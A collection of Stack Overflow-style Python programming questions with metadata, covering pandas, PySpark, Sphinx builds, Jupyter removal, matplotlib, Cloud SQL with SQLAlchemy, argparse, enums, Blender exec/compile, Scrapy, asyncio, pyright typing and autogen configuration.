Dataset schema (value ranges / string lengths observed across rows):
QuestionId: int64, 74.8M - 79.8M
UserId: int64, 56 - 29.4M
QuestionTitle: string, 15 - 150 chars
QuestionBody: string, 40 - 40.3k chars
Tags: string, 8 - 101 chars
CreationDate: string (date), 2022-12-10 09:42:47 - 2025-11-01 19:08:18
AnswerCount: int64, 0 - 44
UserExpertiseLevel: int64, 301 - 888k
UserDisplayName: string, 3 - 30 chars
77,818,659
13,396,497
Read first two and last two rows based on 2 columns
<p>I have a dataframe:</p> <pre><code>dfs = pd.read_csv(StringIO(&quot;&quot;&quot; datetime ID C_1 C_2 C_3 C_4 C_5 C_6 &quot;18/06/2023 3:51:50&quot; 136 101 2024 89 4 3 13 &quot;18/06/2023 3:51:52&quot; 136 101 2028 61 4 3 18 &quot;18/06/2023 3:51:53&quot; 24 101 2029 65 0 0 0 &quot;18/06/2023 3:51:53&quot; 24 102 2022 89 0 0 0 &quot;18/06/2023 3:51:54&quot; 136 102 2045 66 2 3 4 &quot;18/06/2023 3:51:55&quot; 0 101 2022 89 0 0 0 &quot;18/06/2023 3:51:56&quot; 136 101 2222 77 0 0 0 &quot;18/06/2023 3:51:56&quot; 24 102 2022 89 0 0 0 &quot;18/06/2023 3:51:57&quot; 136 101 2024 90 0 0 0 &quot;18/06/2023 3:51:57&quot; 24 101 2026 87 0 1 8 &quot;18/06/2023 3:51:58&quot; 0 102 2045 44 43 42 41 &quot;18/06/2023 3:51:59&quot; 24 102 2043 33 0 1 8 &quot;18/06/2023 3:52:01&quot; 24 101 2022 89 1 4 76 &quot;18/06/2023 3:52:03&quot; 24 102 2046 31 0 1 6 &quot;18/06/2023 3:52:18&quot; 136 101 3333 99 0 1 87 &quot;18/06/2023 3:52:54&quot; 136 102 2045 66 2 3 4 &quot;&quot;&quot;), sep=&quot;\s+&quot;) </code></pre> <p>Is there a way to read the first two and last two rows (one for ID=136 and one for ID=24) for every different C_1?</p> <p>I am trying the below code and it's working as expected, but I am looking for a simpler and faster solution -</p> <pre><code>filter_1 = dfs['ID'].isin(['136']) filter_2 = dfs['ID'].isin(['24']) test_df1 = dfs.loc[filter_1, :] test_df2 = dfs.loc[filter_2, :] g1 = test_df1.groupby('C_1') g2 = test_df2.groupby('C_1') final_df1 = pd.concat([g1.head(1), g1.tail(1)]).drop_duplicates().sort_values('C_1').reset_index(drop=True) final_df2 = pd.concat([g2.head(1), g2.tail(1)]).drop_duplicates().sort_values('C_1').reset_index(drop=True) #merge final_df1 &amp; final_df2 </code></pre> <p>Output -</p> <pre><code> datetime ID C_1 C_2 C_3 C_4 C_5 C_6 &quot;18/06/2023 3:51:50&quot; 136 101 2024 89 4 3 13 &quot;18/06/2023 3:51:53&quot; 24 101 2029 65 0 0 0 &quot;18/06/2023 3:52:01&quot; 24 101 2022 89 1 4 76 &quot;18/06/2023 3:52:18&quot; 136 101 3333 99 0 1 87 &quot;18/06/2023 3:51:53&quot; 24 102 2022 89 0 0 0 &quot;18/06/2023 3:51:54&quot; 136 102 2045 66 2 3 4 &quot;18/06/2023 3:52:03&quot; 24 102 2046 31 0 1 6 &quot;18/06/2023 3:52:54&quot; 136 102 2045 66 2 3 4 </code></pre>
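A single groupby over both keys can replace the two separate filters and concats described above — a minimal sketch of that idea, using a small hypothetical stand-in frame rather than the full data. (One caveat worth checking: if the ID column is read as int64, `isin(['136'])` compares against strings and can silently match nothing in recent pandas versions; comparing against ints avoids that.)

```python
import pandas as pd

# Hypothetical stand-in data with the same shape as the question's frame.
df = pd.DataFrame({
    "ID":  [136, 136, 136, 24],
    "C_1": [101, 101, 101, 101],
    "C_2": [2024, 2028, 3333, 2029],
})

# Group once on both keys; head(1)/tail(1) give the first and last row
# of every (ID, C_1) pair in a single pass.
g = df[df["ID"].isin([136, 24])].groupby(["ID", "C_1"])
out = (
    pd.concat([g.head(1), g.tail(1)])
    .drop_duplicates()            # single-row groups appear twice
    .sort_values(["C_1", "ID"])
    .reset_index(drop=True)
)
```

This keeps one frame throughout, so the final merge step disappears as well.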
<python><pandas>
2024-01-15 09:05:22
1
347
RKIDEV
77,818,549
3,909,896
Read value with hidden carriage return in boolean field as boolean
<p>I'm trying to read (dirty) CSV files from cloud storage with PySpark which sometimes have <code>&lt;boolean&gt;\r</code> values at the end of the line. This is not always the case; the column also contains correct booleans or even nothing (= null).</p> <p>I get a schema from another place which specifies the column types (I have 200+ columns, the one in question is the last one). The column type for the last column is boolean - but since PySpark cannot interpret <code>True\r</code> values as <code>True</code> (same for <code>False\r</code>), I get nulls where I don't want to get nulls.</p> <p>Data example:</p> <pre><code>id,mybool 1,True\r 2,False 3, 4,False\r 5,True 6,True\r </code></pre> <p>How can I ensure that PySpark can interpret the values?</p> <p>I was thinking of editing the schema that I get, changing the DataType to String, cleaning it up and casting it to Boolean, but I was hoping that there is a better way.</p>
<python><csv><pyspark>
2024-01-15 08:44:10
1
3,013
Cribber
77,818,509
1,055,817
ReadTheDocs Sphinx build failing due to version error
<p>I've created a documentation for python library that I released last December. <a href="https://monalysa.readthedocs.io/en/latest/" rel="nofollow noreferrer">https://monalysa.readthedocs.io/en/latest/</a></p> <p>GitHub Repository: <a href="https://github.com/siva82kb/monalysa/tree/main" rel="nofollow noreferrer">https://github.com/siva82kb/monalysa/tree/main</a></p> <p>I've made some changes to the structure of the documentation but the build now fails on ReadTheDocs. Its appears to be an error with the version of Sphinx. I get the following error in the build step.</p> <pre><code>Running Sphinx v4.5.0 loading translations [en]... done Traceback (most recent call last): File &quot;/home/docs/checkouts/readthedocs.org/user_builds/monalysa/envs/latest/lib/python3.9/site-packages/sphinx/registry.py&quot;, line 438, in load_extension metadata = setup(app) File &quot;/home/docs/checkouts/readthedocs.org/user_builds/monalysa/envs/latest/lib/python3.9/site-packages/sphinxcontrib/applehelp/__init__.py&quot;, line 230, in setup app.require_sphinx('5.0') File &quot;/home/docs/checkouts/readthedocs.org/user_builds/monalysa/envs/latest/lib/python3.9/site-packages/sphinx/application.py&quot;, line 393, in require_sphinx raise VersionRequirementError(version) sphinx.errors.VersionRequirementError: 5.0 The above exception was the direct cause of the following exception: Traceback (most recent call last): File &quot;/home/docs/checkouts/readthedocs.org/user_builds/monalysa/envs/latest/lib/python3.9/site-packages/sphinx/cmd/build.py&quot;, line 272, in build_main app = Sphinx(args.sourcedir, args.confdir, args.outputdir, File &quot;/home/docs/checkouts/readthedocs.org/user_builds/monalysa/envs/latest/lib/python3.9/site-packages/sphinx/application.py&quot;, line 219, in __init__ self.setup_extension(extension) File &quot;/home/docs/checkouts/readthedocs.org/user_builds/monalysa/envs/latest/lib/python3.9/site-packages/sphinx/application.py&quot;, line 380, in setup_extension 
self.registry.load_extension(self, extname) File &quot;/home/docs/checkouts/readthedocs.org/user_builds/monalysa/envs/latest/lib/python3.9/site-packages/sphinx/registry.py&quot;, line 441, in load_extension raise VersionRequirementError( sphinx.errors.VersionRequirementError: The sphinxcontrib.applehelp extension used by this project needs at least Sphinx v5.0; it therefore cannot be built with this version. Sphinx version error: The sphinxcontrib.applehelp extension used by this project needs at least Sphinx v5.0; it therefore cannot be built with this version. </code></pre> <p>I have tried to force the version of Sphinx to 5.0.2 and the version of sphinxcontrib.applehelp to 1.0.7, which was the version that successfully worked in the previous version of the documentation.</p> <p>No matter what versions I put down in the requirements.txt file, I get the same error.</p> <p>What have I done wrong? How do I fix this issue?</p>
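The `Running Sphinx v4.5.0` line in the log is a strong hint that Read the Docs never installed the pinned requirements: without a build configuration pointing at the requirements file, RTD falls back to its own default Sphinx, while pip pulls the newest `sphinxcontrib-applehelp`, which requires Sphinx >= 5. One hedged sketch of a fix (file names and paths are assumptions to adapt to the repository layout):

```yaml
# .readthedocs.yaml at the repository root (assumed layout: docs/conf.py)
version: 2
build:
  os: ubuntu-22.04
  tools:
    python: "3.11"
sphinx:
  configuration: docs/conf.py
python:
  install:
    - requirements: docs/requirements.txt
```

`docs/requirements.txt` should then pin a consistent pair, e.g. `sphinx>=5.0` (or, to stay on Sphinx 4, `sphinxcontrib-applehelp==1.0.2`, reportedly the last release that still supports it).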
<python><python-sphinx><read-the-docs>
2024-01-15 08:34:38
1
1,942
siva82kb
77,818,152
11,922,237
How to remove Jupyter + all its components completely (As if it never existed)
<p>After I totally messed up my base (root) environment and the Jupyter installation within, I want to install it from scratch. To do so, I need to remove it entirely from my system. I tried the solutions recommended in <a href="https://stackoverflow.com/questions/33052232/how-to-uninstall-jupyter">this thread</a> but the <code>jupyter</code> command would not stop working and still returned an output.</p> <p>How do I successfully eliminate Jupyter from my system (Linux) and I mean everything:</p> <ul> <li>Jupyter</li> <li>Jupyter Lab</li> <li>All its dependencies</li> <li>All its files, cached/uncached</li> <li>All installed extensions</li> <li>All configurations</li> <li>All kernels</li> <li>All data directories</li> <li>All paths and directories</li> <li>IPython included</li> </ul>
<python><jupyter-notebook><jupyter><jupyter-lab>
2024-01-15 07:12:34
1
1,966
Bex T.
77,817,773
6,676,101
Why would the `plot` method of the `matplotlib` library return an empty list?
<p>I was hoping to make two different plots using <code>matplotlib</code>.</p> <pre class="lang-python prettyprint-override"><code>import matplotlib.pyplot as pltlib import numpy as np x1 = np.arange(1, 5, 0.1) y1 = np.sin(x1) x2 = np.arange(1, 5, 0.1) y2 = np.log10(x2) plot1 = pltlib.plot() plot2 = pltlib.plot(x2, y2) print(type(plot1)) print(plot1) # print(type(plot2)) # print(plot2) </code></pre> <p>Why does the <a href="https://matplotlib.org/stable/api/_as_gen/matplotlib.pyplot.plot.html" rel="nofollow noreferrer"><code>plot</code></a> method return an empty list when a person tries to plot nothing at all? If there is no input data, shouldn't an exception be raised?</p>
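The behavior can be checked directly: `plot` returns the list of `Line2D` artists it just added to the axes, and with no arguments it adds none, so an empty list (rather than an exception) is the consistent result. A minimal sketch using the non-interactive Agg backend:

```python
import matplotlib
matplotlib.use("Agg")  # headless backend, no window needed
import matplotlib.pyplot as plt
import numpy as np

x = np.arange(1, 5, 0.1)
lines = plt.plot(x, np.sin(x))  # one Line2D per x/y pair passed in
empty = plt.plot()              # no data -> no artists created

# plot() always answers "which lines did I just add?";
# the empty call simply added zero lines.
```

Calling `plot()` with no arguments is also a documented idiom for styling or re-fetching axes state, which is another reason it is not treated as an error.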
<python><matplotlib>
2024-01-15 05:10:15
2
4,700
Toothpick Anemone
77,817,609
10,844,607
Cloud Function can't call PostgreSQL multiple times at once, unless test queries are run first
<p>Edit: The answer to this was a bit complicated. The tl;dr is make sure you do <a href="https://cloud.google.com/functions/docs/samples/functions-tips-lazy-globals#functions_tips_lazy_globals-python" rel="nofollow noreferrer">Lazy Loading</a> properly; many of the variables declared in the code below were declared and set globally, but your global variables should be set to <code>None</code> and only changed in your actual API call!</p> <hr /> <p>I'm going bonkers.</p> <p>Here is my full <code>main.py</code>. It can be run locally via <code>functions-framework --target=api</code> or on Google Cloud directly:</p> <pre class="lang-py prettyprint-override"><code>import functions_framework import sqlalchemy import threading from google.cloud.sql.connector import Connector, IPTypes from sqlalchemy.orm import sessionmaker, scoped_session Base = sqlalchemy.orm.declarative_base() class TestUsers(Base): __tablename__ = 'TestUsers' uuid = sqlalchemy.Column(sqlalchemy.String, primary_key=True) cloud_sql_connection_name = &quot;myproject-123456:asia-northeast3:tosmedb&quot; connector = Connector() def getconn(): connection = connector.connect( cloud_sql_connection_name, &quot;pg8000&quot;, user=&quot;postgres&quot;, password=&quot;redacted&quot;, db=&quot;tosme&quot;, ip_type=IPTypes.PUBLIC, ) return connection def init_pool(): engine_url = sqlalchemy.engine.url.URL.create( &quot;postgresql+pg8000&quot;, username=&quot;postgres&quot;, password=&quot;redacted&quot;, host=cloud_sql_connection_name, database=&quot;tosme&quot; ) engine = sqlalchemy.create_engine(engine_url, creator=getconn) # Create tables if they don't exist Base.metadata.create_all(engine) return engine engine = init_pool() # Prepare a thread-safe Session maker Session = scoped_session(sessionmaker(bind=engine)) print(&quot;Database initialized&quot;) def run_concurrency_test(): def get_user(): with Session() as session: session.query(TestUsers).first() print(&quot;Simulating concurrent reads...&quot;) threads 
= [] for i in range(2): thread = threading.Thread(target=get_user) threads.append(thread) thread.start() # Wait for all threads to complete for thread in threads: thread.join() print(f&quot;Thread {thread.name} completed&quot;) print(&quot;Test passed - Threads all completed!\n&quot;) run_concurrency_test() @functions_framework.http def api(request): print(&quot;API hit - Calling run_concurrency_test()...&quot;) run_concurrency_test() return &quot;Success&quot; </code></pre> <p><code>requirements.txt</code>: <div class="snippet" data-lang="js" data-hide="true" data-console="false" data-babel="false"> <div class="snippet-code snippet-currently-hidden"> <pre class="snippet-code-js lang-js prettyprint-override"><code>functions-framework==3.* cloud-sql-python-connector[pg8000]==1.5.* SQLAlchemy==2.* pg8000==1.*</code></pre> </div> </div> </p> <p>It's super simple - and it works! As long as you have a PostgreSQL instance, it will create the TestUsers table as needed, query it twice (at the same time via threads!), and every time you curl it, it works as well. Here's some example output:</p> <pre><code>Database initialized Simulating concurrent reads... Thread Thread-4 (get_user) completed Thread Thread-5 (get_user) completed Test passed - Threads all completed! API hit - Calling run_concurrency_test()... Simulating concurrent reads... Thread Thread-7 (get_user) completed Thread Thread-8 (get_user) completed Test passed - Threads all completed! </code></pre> <p><strong>However</strong>, if I comment out the first call to <code>run_concurrency_test()</code> (i.e. the one that's not inside the <code>api(request)</code>), run it and curl, I get this:</p> <pre><code>Database initialized API hit - Calling run_concurrency_test()... Simulating concurrent reads... Thread Thread-4 (get_user) completed </code></pre> <p>It gets stuck! Specifically, it gets stuck at <code>session.query(TestUsers).first()</code>. 
It didn't get stuck when I ran the concurrency test outside the <code>api()</code> first. To the best of my knowledge, my code is stateless, and thread safe. So what is going on here that makes it suddenly not work?</p>
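The lazy-loading fix mentioned in the question's edit can be reduced to this pattern (the `init_pool` here is a hypothetical stub standing in for the real SQLAlchemy/Cloud SQL setup): module import creates nothing, and the first request builds the engine exactly once.

```python
calls = {"init": 0}

def init_pool():
    # Stub for the question's real connection-pool setup.
    calls["init"] += 1
    return object()

# The global is declared at import time but deliberately left unset...
engine = None

def get_engine():
    # ...and only populated inside a request, so the pool is created in
    # the serving environment rather than during cold-start import.
    global engine
    if engine is None:
        engine = init_pool()
    return engine

def api(request):
    eng = get_engine()
    return "Success"
```

The same deferral would apply to the `scoped_session` maker: anything that touches the database belongs behind the lazy getter, not at module top level.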
<python><flask><sqlalchemy><google-cloud-functions><google-cloud-sql>
2024-01-15 03:48:40
2
5,694
Dr-Bracket
77,817,496
4,451,521
argparse with a pair of floats
<p>Is there an elegant way to introduce a pair of floats using argparse?</p> <p>I know I can use both separately and later process them to convert them into a numpy array of two floats, or even I have been suggested to enter the pair as a string and convert them to numbers but both seem ugly and unnecessary.</p> <p>Is there a way to introduce a pair of floats so as later have them as a numpy array?</p> <h3>First way</h3> <pre><code>def parse_arguments(): parser = argparse.ArgumentParser(description='Process two float numbers.') # Define two float arguments parser.add_argument('--number1', type=float, help='Enter the first float number') parser.add_argument('--number2', type=float, help='Enter the second float number') args = parser.parse_args() # Check if both arguments are provided if args.number1 is not None and args.number2 is not None: # Create a numpy array result_array = np.array([args.number1, args.number2]) return result_array else: # Handle the case when one or both arguments are not provided print(&quot;Please provide both float numbers.&quot;) return None </code></pre> <h3>Second way</h3> <pre><code>def parse_arguments(): parser = argparse.ArgumentParser(description='Process two float numbers.') # Define an argument for two float numbers separated by a comma parser.add_argument('--float_numbers', type=str, help='Enter two float numbers separated by a comma (e.g., 1.0,2.5)') args = parser.parse_args() # Check if the argument is provided if args.float_numbers is not None: # Split the string into two floats numbers = [float(x) for x in args.float_numbers.split(',')] # Create a numpy array result_array = np.array(numbers) return result_array else: # Handle the case when the argument is not provided print(&quot;Please provide two float numbers.&quot;) return None </code></pre>
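argparse can consume the pair directly with `nargs=2`, which avoids both workarounds above; a minimal sketch (the flag name `--pair` is an arbitrary choice):

```python
import argparse
import numpy as np

parser = argparse.ArgumentParser(description="Process two float numbers.")
parser.add_argument(
    "--pair",
    nargs=2,              # exactly two values must follow the flag
    type=float,           # each value converted to float individually
    metavar=("X", "Y"),
    required=True,
    help="two floats, e.g. --pair 1.0 2.5",
)

# Simulated command line; in a real script this would be parser.parse_args().
args = parser.parse_args(["--pair", "1.0", "2.5"])
result_array = np.array(args.pair)
```

`required=True` also replaces the manual "please provide both numbers" check: argparse itself rejects a missing or incomplete pair with a usage message.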
<python><argparse>
2024-01-15 02:59:25
0
10,576
KansaiRobot
77,817,356
10,693,596
How to correctly define a classmethod that accesses a value of a mangled child attribute?
<p>In Python, how do I correctly define a classmethod of a parent class that references an attribute of a child class?</p> <pre class="lang-py prettyprint-override"><code>from enum import Enum class LabelledEnum(Enum): @classmethod def list_labels(cls): return list(l for c, l in cls.__labels.items()) class Test(LabelledEnum): A = 1 B = 2 C = 3 __labels = { 1: &quot;Label A&quot;, 2: &quot;Custom B&quot;, 3: &quot;Custom label for value C + another string&quot;, } print(Test.list_labels()) # expected output # [&quot;Label A&quot;, &quot;Custom B&quot;, &quot;Custom label for value C + another string&quot;] </code></pre> <p>In the code above I expect that <code>Test.list_labels()</code> will correctly print out the labels, however because the <code>__labels</code> dictionary is defined with the double underscore, I cannot access it correctly.</p> <p>The reason I wanted to have double underscore is to make sure that the labels would not show up when iterating over the enumerator, e.g. list(Test) should not show the dictionary containing labels.</p>
<python><enums><python-class>
2024-01-15 01:59:08
3
16,692
SultanOrazbayev
77,817,085
2,249,815
Python 3.X exec + compile - pass command line arguments
<p>I see answers on how to pass command line arguments to exec but not if compile is nestled inside.</p> <p>Provided with the code:</p> <pre><code>filename = 'C:\\temp\\script.py' exec(compile(open(filename).read(),filename, 'exec')) </code></pre> <p><strong>How can I pass command line arguments or input to the calling code?</strong></p> <hr /> <p>Additional context (you don't have to read):</p> <p>A program called Blender has a built-in text editor / interpreter. And I want to inject code using the statement above. I tried using exec by itself without success. That's why I need exec and compile together. Code structure looks like this:</p> <pre><code>import bpy # Create a new material mat_ref = bpy.data.materials.new(&quot;Mat for joined object&quot;) # Use shader nodes to render the material mat_ref.use_nodes = True nodes = mat_ref.node_tree.nodes # Start from fresh state mat_ref.node_tree.links.clear() mat_ref.node_tree.nodes.clear() # Create the Shader nodes node_diffuse = nodes.new( type = 'ShaderNodeBsdfDiffuse' ) node_matoutput = nodes.new( type = 'ShaderNodeOutputMaterial' ) node_voronoi = nodes.new( type = 'ShaderNodeTexVoronoi' ) # Link the shader nodes mat_ref.node_tree.links.new( node_diffuse.outputs['BSDF'], node_matoutput.inputs['Surface'] ) mat_ref.node_tree.links.new( node_voronoi.outputs['Distance'], node_matoutput.inputs['Displacement'] ) # Change properties of shader nodes mat_ref.node_tree.nodes[&quot;Voronoi Texture&quot;].inputs[2].default_value = 300 </code></pre>
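Because the executed script shares the caller's interpreter state, the calling code can simply assign `sys.argv` before the `exec` — a sketch using a temporary file as a stand-in for `C:\temp\script.py`:

```python
import os
import sys
import tempfile

# Hypothetical stand-in for script.py; it reads sys.argv like any script.
fd, filename = tempfile.mkstemp(suffix=".py")
with os.fdopen(fd, "w") as f:
    f.write("import sys\nresult = sys.argv[1:]\n")

saved_argv = sys.argv
sys.argv = [filename, "--size", "3"]   # what the script will see as its command line
try:
    namespace = {"__name__": "__main__"}
    exec(compile(open(filename).read(), filename, "exec"), namespace)
finally:
    sys.argv = saved_argv              # restore the caller's argv
    os.remove(filename)
```

In Blender's text editor the same assignment works immediately before the `exec` line; alternatively, values can be passed in through the globals dict given to `exec`, which avoids touching `sys.argv` at all.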
<python><python-3.x><blender>
2024-01-14 23:34:59
1
4,653
Jebathon
77,816,808
9,582,542
Scrapy Collecting Data From Table
<p>I dont get errors from the script below but this script returns no data. I am trying to get all the games for each of the weeks which start in table 4 in the html. When I enter the xpath commands in the scrapy shell I get data but once I put in the parse definition I dont get anything in return.</p> <pre><code>import scrapy class NFLOddsSpider(scrapy.Spider): name = 'NFLOdds' allowed_domains = ['www.sportsoddshistory.com'] start_urls = ['https://www.sportsoddshistory.com/nfl-game-season/?y=2022'] def parse(self, response): for row in response.xpath('//table[@class=&quot;soh1&quot;]//tbody/tr'): day = row.xpath('td[1]//text()').extract_first() date = row.xpath('td[2]//text()').extract_first() time = row.xpath('td[3]//text()').extract_first() AtFav = row.xpath('td[4]//text()').extract_first() favorite = row.xpath('td[5]//text()').extract_first() score = row.xpath('td[6]//text()').extract_first() spread = row.xpath('td[7]//text()').extract_first() AtDog = row.xpath('td[8]//text()').extract_first() underdog = row.xpath('td[9]//text()').extract_first() OvUn = row.xpath('td[10]//text()').extract_first() notes = row.xpath('td[11]//text()').extract_first() week = row.xpath('//*[@id=&quot;content&quot;]/div/table[4]/tbody/tr/td/h3').extract_first() oddsTable = { 'day': day, 'date': date, 'time': time, 'AtFav': AtFav, 'favorite': favorite, 'score': score, 'spread': spread, 'AtDog': AtDog, 'underdog': underdog, 'OvUn': OvUn, 'notes': notes, 'week' : week } yield oddsTable </code></pre>
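One frequent cause of "works in the shell, empty in the spider" with tables is `tbody`: browsers insert it when rendering, so an XPath copied from dev tools may match nothing in the raw HTML Scrapy downloads. The contrast can be seen with lxml (the parser behind Scrapy's selectors) on a hypothetical fragment:

```python
import lxml.html

# Raw HTML as a server typically sends it: no <tbody> element at all.
html = """
<table class="soh1">
  <tr><td>Sun</td><td>Sep 11, 2022</td></tr>
  <tr><td>Sun</td><td>Sep 18, 2022</td></tr>
</table>
"""
doc = lxml.html.fromstring(html)

rows_with_tbody = doc.xpath('//table[@class="soh1"]//tbody/tr')  # browser-style path
rows_plain = doc.xpath('//table[@class="soh1"]//tr')             # matches the raw markup
```

If the shell really does return data for the `tbody` paths, the cause lies elsewhere (for example, the absolute `//*[@id="content"]/...` expression for `week` running once per row); dropping `tbody` from row selectors is still the safer habit.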
<python><scrapy>
2024-01-14 21:45:59
2
690
Leo Torres
77,816,676
6,753,182
Is it possible to immediately interrupt the AsyncIO event loop upon task completion?
<p>Take a look at the following simple program:</p> <pre class="lang-py prettyprint-override"><code>import asyncio def callback(_): loop = asyncio.get_running_loop() loop.stop() async def echo(msg): print(msg) async def main(): loop = asyncio.get_running_loop() taskA = loop.create_task(echo(&quot;TaskA&quot;)) taskA.add_done_callback(callback) taskB = loop.create_task(echo(&quot;TaskB&quot;)) await taskB asyncio.run(main()) </code></pre> <p>Currently it outputs</p> <pre><code>TaskA TaskB </code></pre> <p>To me this means that the callback calling <code>loop.stop()</code> will be scheduled on the event loop using something semantically similar to <code>loop.call_soon(callback(taskA))</code> instead of being run immediately after <code>TaskA</code> completes.</p> <p>Is there a different mechanism that interrupts the event loop <em>immediately</em> after a task finishes without explicitly waiting for this task elsewhere? Alternatively, is there a way to hook into the event loop and run some logic every time it changes between concurrently running tasks?</p> <p>My goal is to create a debugging mechanism that will monitor a task and immediately interrupt the event loop when an uncaught exception is raised. The reason I want this to happen immediately instead of when I <code>await tracked_task</code> is because I want to preserve the current shared state of the task so that I may inspect it in a debugger.</p>
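`add_done_callback` always goes through `call_soon`, so it cannot fire ahead of callbacks already scheduled. A wrapper coroutine, by contrast, runs inside the task itself and can stop the loop at the exact point the exception escapes — a sketch of that idea (the names are illustrative, not a standard API):

```python
import asyncio

async def stop_on_error(coro):
    # Runs in the task: the except clause executes the moment the
    # exception propagates, not on a later loop iteration.
    try:
        return await coro
    except Exception:
        asyncio.get_running_loop().stop()
        raise

async def boom():
    raise ValueError("inspect me")

loop = asyncio.new_event_loop()
tracked_task = loop.create_task(stop_on_error(boom()))
loop.run_forever()          # returns once the tracked task fails
```

`loop.stop()` still lets callbacks already queued for the current iteration finish, so this is "immediate" at task granularity; for the debugging goal, the failed task and its state remain inspectable after `run_forever()` returns.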
<python><python-asyncio><event-loop>
2024-01-14 20:57:05
1
3,290
FirefoxMetzger
77,816,072
998,248
How does pyright retain argument type information with `partial`?
<p>Take this simple example</p> <pre class="lang-py prettyprint-override"><code>from functools import partial def foo(a: str, b: int, c: float, d:str) -&gt; bool: print(a, b, c, d) return True bar = partial(foo, 'a', 1, 2.0) bar() # error </code></pre> <p>Pyright can correctly identify that <code>bar</code> needs another argument named <code>d</code> of type <code>str</code>, but how? I looked at both the actual definition of partial (in python 3.8 - 3.10) and the typeshed types. The actual definition has no types of course, but this is what my typeshed partial definition looks like</p> <pre class="lang-py prettyprint-override"><code>class partial(Generic[_T]): @property def func(self) -&gt; Callable[..., _T]: ... @property def args(self) -&gt; tuple[Any, ...]: ... @property def keywords(self) -&gt; dict[str, Any]: ... def __new__(cls, __func: Callable[..., _T], *args: Any, **kwargs: Any) -&gt; Self: ... def __call__(__self, *args: Any, **kwargs: Any) -&gt; _T: ... if sys.version_info &gt;= (3, 9): def __class_getitem__(cls, item: Any) -&gt; GenericAlias: ... </code></pre> <p>Nothing about that definition should be preserving the types because it just uses <code>Any</code> and <code>...</code> in place of args. You can even copy it out, rename it to <code>mypartial</code>, try to use it and observe that you don't get the same type safety. My understanding is that you might be able to preserve the type information with <code>ParamSpec</code> but that isn't being used here and my version of Python can't access it anyway.</p> <p>Am I missing something or does Pyright just hard code knowledge about what certain things should be, regardless of the types?</p>
<python><python-typing><pyright>
2024-01-14 17:43:32
1
2,791
Anthony Naddeo
77,815,953
17,835,120
Autogen connecting to config file errors
<p>I get errors connecting to config files for models using autogen; the error seems to depend on the Python code I am executing.</p> <p>My goal is to have one config file that will work for any autogen project.</p> <p>I'm able to execute a basic conversation between <code>assistant</code> and <code>user_proxy</code>, but adapting the python script to <code>autoagent</code> triggers this error:</p> <pre><code> docker run -it --rm autogen-project Traceback (most recent call last): File &quot;autogen_agentbuilder.py&quot;, line 6, in &lt;module&gt; config_list = autogen.config_list_from_json(config_path) File &quot;/usr/local/lib/python3.8/site-packages/autogen/oai/openai_utils.py&quot;, line 458, in config_list_from_json with open(config_list_path) as json_file: FileNotFoundError: [Errno 2] No such file or directory: 'OAI_CONFIG_LIST.json' </code></pre> <p>To better isolate the issue, I ran the code in Docker (thinking this would reduce any errors caused by my machine).</p> <p>I used code provided in two demos on YouTube. The <a href="https://www.youtube.com/watch?v=Cgl9HkbZe5s" rel="nofollow noreferrer">first demo</a> was to get assistant and user_proxy to write some code inside of Docker. 
I followed the implementation of this code step by step and it worked.</p> <p>But then I tried to use the same setup with some adapted <a href="https://mer.vin/2023/12/autobuilder/" rel="nofollow noreferrer">code</a> from <a href="https://www.youtube.com/watch?v=pIo7sQ-7jyk&amp;t=186s" rel="nofollow noreferrer">another demo to run AgentBuilder</a>() and this failed.</p> <p>The second demo's code had a slightly different setup.</p> <p>Working.py</p> <pre><code> import autogen # import OpenAI API key config_list = autogen.config_list_from_json(env_or_file=&quot;OAI_CONFIG_LIST&quot;) # create the assistant agent assistant = autogen.AssistantAgent( name=&quot;assistant&quot;, llm_config={&quot;config_list&quot;: config_list} ) # Create the user proxy agent user_proxy = autogen.UserProxyAgent( name=&quot;UserProxy&quot;, code_execution_config={&quot;work_dir&quot;: &quot;results&quot;} ) # Start the conversation user_proxy.initiate_chat( assistant, message=&quot;Write a code to print odd numbers from 2 to 100.&quot; ) </code></pre> <p>OAI_CONFIG_LIST</p> <pre><code>[ { &quot;model&quot;: &quot;gpt-3.5-turbo&quot;, &quot;api_key&quot;: &quot;Ap-12345678912234455&quot; } ] </code></pre> <p>Error.py</p> <pre><code> # import OpenAI API key config_list = autogen.config_list_from_json(env_or_file=&quot;OAI_CONFIG_LIST&quot;) **default_llm_config = {'temperature': 0}** # 2. Initializing Builder builder = AgentBuilder(config_path=config_path) # 3. Building agents building_task = &quot;Find a paper on arxiv by programming, and analyze its application in some domain...&quot; agent_list, agent_configs = builder.build(building_task, default_llm_config) # 4. 
Multi-agent group chat group_chat = autogen.GroupChat(agents=agent_list, messages=[], max_round=12) manager = autogen.GroupChatManager(groupchat=group_chat, llm_config={&quot;config_list&quot;: config_list, **default_llm_config}) agent_list[0].initiate_chat( manager, message=&quot;Find a recent paper about gpt-4 on arxiv...&quot; </code></pre> <p>After the template <a href="https://mer.vin/2023/12/autobuilder/" rel="nofollow noreferrer">code</a> triggered an error related to the config file, I tried to adapt the python code to the above so that it would mirror Working.py; however, I still encountered the error. The only things I changed were the llm model, from <code>gpt-3.5-turbo</code> to <code>gpt-4</code>, and adding <code>default_llm_config = {'temperature': 0}</code> to the third line of the configuration code.</p> <pre><code># 1. Configuration config_path = 'OAI_CONFIG_LIST.json' config_list = autogen.config_list_from_json(config_path) **default_llm_config = {'temperature': 0}** </code></pre> <p>Then it was changed to mirror Working.py:</p> <pre><code># import OpenAI API key config_list = autogen.config_list_from_json(env_or_file=&quot;OAI_CONFIG_LIST&quot;) default_llm_config = {'temperature': 0} </code></pre> <p>OAI_CONFIG_LIST</p> <pre><code>[ { &quot;model&quot;: &quot;gpt-4&quot;, &quot;api_key&quot;: &quot;Ap-12345678912234455&quot; } ] </code></pre> <p>I can't understand why, with virtually the same code pulling in the config file values, it triggers an error.</p>
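Given the traceback, the most likely culprit is plain file resolution: `config_list_from_json('OAI_CONFIG_LIST.json')` ends in an `open()` on exactly that string, while the working script's file on disk is named `OAI_CONFIG_LIST` with no extension. A hypothetical minimal reproduction of just that mismatch, with no autogen dependency:

```python
import json
import os
import tempfile

# Stand-in for the working config file: note there is no .json extension.
workdir = tempfile.mkdtemp()
path = os.path.join(workdir, "OAI_CONFIG_LIST")
with open(path, "w") as f:
    json.dump([{"model": "gpt-4", "api_key": "placeholder"}], f)

def load_config_list(name):
    # Mirrors the open() inside config_list_from_json: the string must
    # match the on-disk name exactly, extension included.
    with open(name) as f:
        return json.load(f)

ok = load_config_list(path)              # succeeds
try:
    load_config_list(path + ".json")     # the failing spelling from the traceback
    missing = False
except FileNotFoundError:
    missing = True
```

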